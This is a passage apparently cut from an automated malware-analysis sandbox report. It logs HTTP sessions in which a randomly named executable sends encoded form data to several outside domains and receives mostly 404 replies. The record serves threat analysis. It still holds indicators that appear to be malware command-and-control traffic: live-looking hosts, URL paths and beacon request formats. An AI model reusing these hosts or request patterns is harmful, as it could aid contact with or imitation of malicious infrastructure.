XbDhGVR=9EbyNravHfVOJwgfNkO3jjteW3sOh/rOoN6DZjYwgMvhY962vgnekuAvCb9wGz2hxa347j2AU34FBERodl1mEkUj2X11AKPnGkGaLO6ZSXyF5OU4k7mFEYVjdQK3Zp63U9Mc37XzdYoA4rRmEnh0evw61TPpSzwNRV000fVUdjZO9Gnq2ZC1Gf//brK01bJC57IRYkHjQsgpRvhIiFYlbKfcPatvl2uJQLAny1lGfpq+BTy+QZR8PnITu5qpeNpmP820U1QTBe3zT4Nk6S8kQqhIYBJ4F830KURV6cgmWfCLTKutx67LYMEb3Px5gPOrAxA+c74s+Hv9CXWXIptHT8rC9/uKNizSwry9XN3euX3xWgRQtoIO+R9FrddgSRzDvkUiyNkiQR+3zOm+ZMbNJqdKPsyLijlwPyTqmPWjv2ycU67X8WY3+oCN80WMD3pMLWjO4RJOOHg2MT5zcIJjH8JhgYoS5ePp6CClQZIE+mXd94OG5TibHGozJALUdNBHEYNCffzNdSBk652y1loLCMfE1pDgK7OIsf2mKsSpZL6QDm5UdpBg8NlCiomuv43OqBywyFRnedgtJKbAy0bgUvJB3C74qYR1N2wc1Op1pLPI8I0fHdtTYmkJ3etpS+gOyfIuIIExJhj2oOBR5RpjS/JJOYbBY2BVt8m+uDr29Oqi2jLi+r35HN5PPwxnZX0mx2oRsSweYya1V2K4sCt5WUBD8te9sF1qu+QRr37XZP7kwBR1xKAF4c9UoAl0FeLfGyPA08i9ftgyd9kK6myL5pFFK34Tp++PmTpz7fjCZs/YAXI641a0Co73CS9Gmz2VwkqRvSMily6oe53MPX7oAwEiG4KwbjtpAXMNwZLoMN21xX5eKMPLPYSw4/XVySKUfiHPMNccA0mGCvVOilcEVjHFz/6vCW02dYWm1F+y6eiDxVImjz2VefY082hIGN+8oQLNS4bFdwhSB7DEnkmbYpRrd3dTruK3JVc4+0uwl/zK [TRUNCATED]
                                                                                        Nov 1, 2024 19:45:03.487620115 CET302INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:03 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.450023206.119.82.172804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:05.048012972 CET445OUTGET /a3g3/?XbDhGVR=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:45:06.283180952 CET302INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:05 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.450024103.191.208.137804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:20.373266935 CET728OUTPOST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 56 47 69 55 6d 4e 67 34 4e 4b 52 33 47 52 58 6c 36 68 35 56 61 71 53 65 37 78 55 6c 6b 75 45 49 2b 77 68 71 71 32 69 77 6f 43 72 34 66 57 32 30 50 34 4f 6a 32 37 39 79 33 41 6a 50 32 73 49 6d 70 58 36 67 45 56 49 69 39 7a 66 38 58 63 54 74 42 76 6f 49 43 56 52 63 4f 6a 64 50 32 68 30 35 6e 73 42 30 30 77 32 70 74 42 6d 7a 7a 31 39 33 4b 50 71 33 43 57 63 4a 78 54 76 75 76 6f 49 67 41 34 6b 6e 78 51 37 57 64 4c 38 7a 6d 78 2f 61 50 64 66 62 67 71 33 54 49 73 41 51 2b 41 5a 56 61 54 51 73 37 64 4f 4b 4f 7a 4d 44 6f 35 42 4e 4c 4e 50 51 43 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=hgmmgJ12deh1VGiUmNg4NKR3GRXl6h5VaqSe7xUlkuEI+whqq2iwoCr4fW20P4Oj279y3AjP2sImpX6gEVIi9zf8XcTtBvoICVRcOjdP2h05nsB00w2ptBmzz193KPq3CWcJxTvuvoIgA4knxQ7WdL8zmx/aPdfbgq3TIsAQ+AZVaTQs7dOKOzMDo5BNLNPQCg==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.450025103.191.208.137804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:22.911436081 CET748OUTPOST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 63 51 49 2b 52 52 71 72 7a 43 77 72 43 72 34 51 32 32 39 46 59 4f 6b 32 37 68 55 33 46 6a 50 32 73 4d 6d 70 53 57 67 45 6d 67 6c 79 44 66 45 59 38 54 6a 46 76 6f 49 43 56 52 63 4f 6c 78 70 32 6e 63 35 6b 66 5a 30 79 52 32 71 67 68 6d 30 69 31 39 33 42 76 72 2b 43 57 64 63 78 53 44 45 76 71 41 67 41 35 55 6e 78 42 37 5a 47 37 38 78 69 78 2f 4b 4a 65 36 69 2f 4c 47 4d 41 36 55 38 2f 42 64 61 62 56 64 32 71 73 76 64 63 7a 6f 77 31 2b 49 35 47 4f 79 5a 5a 72 53 31 61 35 4a 69 58 4f 6c 2b 47 4d 51 71 34 6c 66 69 57 2b 41 3d
                                                                                        Data Ascii: XbDhGVR=hgmmgJ12deh1aHSUpKM4PqR4DRXloh5Zaqee7wB+kcQI+RRqrzCwrCr4Q229FYOk27hU3FjP2sMmpSWgEmglyDfEY8TjFvoICVRcOlxp2nc5kfZ0yR2qghm0i193Bvr+CWdcxSDEvqAgA5UnxB7ZG78xix/KJe6i/LGMA6U8/BdabVd2qsvdczow1+I5GOyZZrS1a5JiXOl+GMQq4lfiW+A=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.450026103.191.208.137804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:25.472213984 CET10830OUTPOST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 64 6f 49 2b 44 4a 71 71 53 43 77 71 43 72 34 4f 47 32 34 46 59 4f 35 32 37 70 51 33 46 6e 78 32 75 45 6d 37 45 43 67 43 58 67 6c 6c 54 66 45 54 63 54 75 42 76 6f 5a 43 52 4e 48 4f 6a 52 70 32 6e 63 35 6b 5a 64 30 31 41 32 71 7a 52 6d 7a 7a 31 39 46 4b 50 72 57 43 57 46 4d 78 53 33 2b 76 65 4d 67 41 61 38 6e 33 7a 54 5a 62 4c 38 33 75 52 2b 56 4a 65 47 44 2f 50 65 41 41 36 49 53 2f 42 70 61 5a 30 38 64 31 50 33 55 42 42 38 65 72 66 55 54 4b 73 57 6c 66 71 48 42 65 4a 30 39 41 4e 74 6f 4a 73 74 45 39 6d 4c 6d 49 49 6f 6a 58 43 62 74 31 78 37 33 52 6f 2b 6d 4d 36 73 5a 66 65 4c 44 59 73 2f 74 62 2f 63 53 57 32 37 44 58 49 57 74 75 34 36 4c 53 6d 53 64 50 36 67 4d 72 2b 4a 5a 5a 57 43 64 71 36 66 75 43 6c 6d 42 67 74 6f 61 6c 6b 48 30 58 6a 4f 7a 42 4b 4b 77 51 2f 54 4f 54 57 43 34 70 69 49 47 4c 31 65 7a 6d 74 4f 65 72 6c 66 58 73 4b 49 48 59 31 32 65 47 33 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=hgmmgJ12deh1aHSUpKM4PqR4DRXloh5Zaqee7wB+kdoI+DJqqSCwqCr4OG24FYO527pQ3Fnx2uEm7ECgCXgllTfETcTuBvoZCRNHOjRp2nc5kZd01A2qzRmzz19FKPrWCWFMxS3+veMgAa8n3zTZbL83uR+VJeGD/PeAA6IS/BpaZ08d1P3UBB8erfUTKsWlfqHBeJ09ANtoJstE9mLmIIojXCbt1x73Ro+mM6sZfeLDYs/tb/cSW27DXIWtu46LSmSdP6gMr+JZZWCdq6fuClmBgtoalkH0XjOzBKKwQ/TOTWC4piIGL1ezmtOerlfXsKIHY12eG3Lb/UJ8rZIw6qNmt0+lsoiR65GqLHLSWapbeVG4ZRVrcIwkDkpTBoz6ymnVs5baXNHUtV71NIHJ9oYjOiyMFAmZnFZmirfUmykZGFQBeQc4MJXpHzqjRSTwuA0k40ua9NK2wbcwypTxr8jk4iLrG2pR5zp0dUo4M5smEV2ptRjbAk1G2pjWvxzh6eT7qt2+iYQCqFyAv1HtWYL/nZsq6UMwFBH/3EAOjqqJtNt6Ahx2hYIxHElXGyMo8glgkhLc9mRMbqV5bII74h68QAapxelKJCojnqkDNhmqs2ziTp6GUryJo/b+/adk3AyYiI7xEt27Mwog6n0vLrqdmInxRNxIJQ+LfB1dTbKQ9anF87Z4MZuNt6r0y7vBX4Qil3f8pcSow397HpZ0cZVGvr4FzvwBiB3LWnZbzcLY7R0zbkn7G0lVNE9Hc3kKo058m9DYsM36g83mTtYhcTx4voVXT+M3qb/yuBzn7mzf/w7J8+OvxYTX9qV335rzspM85xn0Fb8iQeGJrJspeoyuJBx+Oxv3dvKSc1qfWG0lPQKLzJuuC3TQGoWZ05TEmu7IYTKfyc7/KMjOYZ6/6YzZiPJkSk8EVtvXq3kIBdteVE5tsGtNNDcOMTUbGX/Zi5Ur/+PmiioIiqAQ8zlxYJ1TRWWK7h6241WcQ+ZiLkMB [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.450027103.191.208.137804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:28.017379045 CET454OUTGET /3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:45:30.021539927 CET523INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        x-redirect-by: WordPress
                                                                                        location: http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP
                                                                                        x-litespeed-cache: miss
                                                                                        content-length: 0
                                                                                        date: Fri, 01 Nov 2024 18:45:29 GMT
                                                                                        server: LiteSpeed
                                                                                        vary: User-Agent


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.4500283.111.160.216804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:35.319185019 CET698OUTPOST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 4a 63 6c 63 78 7a 62 47 71 33 46 56 5a 43 42 71 67 6e 53 6e 77 4a 47 63 56 50 57 4e 36 53 4d 5a 4e 4a 49 47 41 47 4b 73 79 65 78 42 4f 44 69 62 32 5a 76 57 4e 54 33 45 41 6b 6e 61 58 53 30 51 6d 70 58 44 64 33 55 51 38 70 5a 61 4a 44 47 54 53 46 66 51 30 61 37 42 6c 54 41 63 6e 5a 41 51 45 62 33 79 71 41 51 4b 50 43 36 71 67 41 43 67 6c 4c 32 78 6b 6e 58 4e 4a 55 71 31 6b 45 45 2b 52 49 6f 78 2f 6f 39 35 44 59 57 41 50 68 54 46 75 70 59 47 79 43 77 5a 6f 55 68 58 48 7a 34 6d 37 64 78 4d 75 49 66 52 53 61 75 51 68 47 47 6c 46 69 76 70 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=oLWKSJnQTRF0UJclcxzbGq3FVZCBqgnSnwJGcVPWN6SMZNJIGAGKsyexBODib2ZvWNT3EAknaXS0QmpXDd3UQ8pZaJDGTSFfQ0a7BlTAcnZAQEb3yqAQKPC6qgACglL2xknXNJUq1kEE+RIox/o95DYWAPhTFupYGyCwZoUhXHz4m7dxMuIfRSauQhGGlFivpg==
                                                                                        Nov 1, 2024 19:45:36.381829023 CET335INHTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:36 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.4500293.111.160.216804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:37.862956047 CET718OUTPOST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 47 4d 61 74 5a 49 48 42 47 4b 35 79 65 78 50 75 44 37 44 57 59 43 57 4b 62 4a 45 43 67 6e 61 58 57 30 51 6e 5a 58 44 71 4c 62 52 73 70 62 53 70 44 45 65 79 46 66 51 30 61 37 42 6c 33 71 63 6e 52 41 51 56 4c 33 77 50 67 54 4a 50 43 37 39 51 41 43 74 46 4c 79 78 6b 6e 35 4e 49 49 4d 31 6d 4d 45 2b 55 6b 6f 32 75 6f 38 7a 44 59 51 45 50 68 42 42 39 45 7a 47 54 2f 73 61 71 30 7a 56 33 75 59 6e 39 51 72 64 66 70 49 44 53 2b 64 4e 6d 50 79 6f 47 66 6d 79 68 79 39 36 49 53 49 76 65 34 39 37 33 6d 79 43 4e 4d 55 64 46 6f 3d
                                                                                        Data Ascii: XbDhGVR=oLWKSJnQTRF0UpslRybbR63GWZCBzwmVnwNGcUKdNIGMatZIHBGK5yexPuD7DWYCWKbJECgnaXW0QnZXDqLbRspbSpDEeyFfQ0a7Bl3qcnRAQVL3wPgTJPC79QACtFLyxkn5NIIM1mME+Uko2uo8zDYQEPhBB9EzGT/saq0zV3uYn9QrdfpIDS+dNmPyoGfmyhy96ISIve4973myCNMUdFo=
                                                                                        Nov 1, 2024 19:45:38.926793098 CET335INHTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:38 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.4500303.111.160.216804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:40.415122986 CET10800OUTPOST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 65 4d 61 65 68 49 48 69 2b 4b 2f 43 65 78 51 65 44 6d 44 57 59 36 57 4c 2f 56 45 43 74 51 61 56 2b 30 53 46 52 58 49 37 4c 62 62 73 70 62 65 4a 44 42 54 53 46 4f 51 30 4b 2f 42 6c 6e 71 63 6e 52 41 51 57 44 33 30 61 41 54 47 76 43 36 71 67 41 30 67 6c 4c 61 78 6b 75 45 4e 49 4d 36 32 53 41 45 2b 30 30 6f 30 63 41 38 2f 44 59 53 4a 76 67 53 42 39 49 73 47 53 54 67 61 75 38 64 56 31 79 59 6d 72 6b 31 4a 2b 67 55 63 68 71 70 5a 31 37 55 6a 6e 6a 46 38 79 47 55 37 6f 71 45 34 36 6f 58 32 6e 72 5a 66 50 73 73 42 44 72 73 70 44 59 4c 4e 69 4d 47 76 4e 69 6b 37 37 77 6f 4c 64 55 6d 53 6d 62 46 6b 66 37 55 35 31 34 6c 34 35 79 6b 74 6a 57 65 4e 73 78 77 52 46 2b 66 45 71 42 68 32 79 58 70 4a 33 6f 50 4f 43 78 49 66 59 4f 72 32 56 45 76 64 5a 37 32 4a 32 6f 47 69 31 4f 4c 49 46 2f 75 63 41 77 50 77 65 43 41 4c 58 37 6a 53 48 36 43 63 58 48 59 5a 6e 61 7a 45 46 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=oLWKSJnQTRF0UpslRybbR63GWZCBzwmVnwNGcUKdNIeMaehIHi+K/CexQeDmDWY6WL/VECtQaV+0SFRXI7LbbspbeJDBTSFOQ0K/BlnqcnRAQWD30aATGvC6qgA0glLaxkuENIM62SAE+00o0cA8/DYSJvgSB9IsGSTgau8dV1yYmrk1J+gUchqpZ17UjnjF8yGU7oqE46oX2nrZfPssBDrspDYLNiMGvNik77woLdUmSmbFkf7U514l45yktjWeNsxwRF+fEqBh2yXpJ3oPOCxIfYOr2VEvdZ72J2oGi1OLIF/ucAwPweCALX7jSH6CcXHYZnazEFQx7MP5b+C0d11mTdP1smS9eyiG5LZ0Wnt0IfivP6aVLO60k/hFLcYmi4QywOyIjG2QMe1no9jia5gWLuy1lVVO7N2L9PFxvWxXxFli+o3JY/IuYUtw8Qng2VlO24py8GPN0qFnc9H02Iz9iw36VPPf7sqtmdcd+VywLsp/5gdLP8xxrphtw8rKgLrGJ9yWg/WUThxTCkE7kFVD17xNFTvvizr+uIM2D9Nx96gYUVlEN9SWysiSOqv3D/EPE4j/N7M+9EHHeJobrhqg1G1PC4nCp1avbZCZjkdfBTxih8Ki7cCHc4yXxFsqfyoUtKn7+gGSZ+BYqG171jwFFXa3trODN8+XPcwSQjII1C0fGFFU/cDC765CnEiJvJk0qD00ZBhz+fST7ELGj85Sp4lLnb06AmfpesdLuKHGRV4CO+FOftwWsZfIxGZcNzBcWMZfX4SmjAM8wnZx+JLcD+e8+ctwXIaassgBcD4INrrtrZVlRCRkbx5bRrb8OKpDmxff86thZ9KDBPGPq/aF99BNBDO+UB9gTJ7/np0+l0VBY/X81WbcXi2aVZWp/zCxJQ3TMywPvWYg7zR/9wjpna3zT0LoxTFjiTyo9Br7ZyufTvLyBIl75u7gxIHs28KzVH5m9gy3vUXwHCMywm1Cna0x9WexboXU7avB4K4V [TRUNCATED]
                                                                                        Nov 1, 2024 19:45:41.508430958 CET335INHTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:41 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.4500313.111.160.216804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
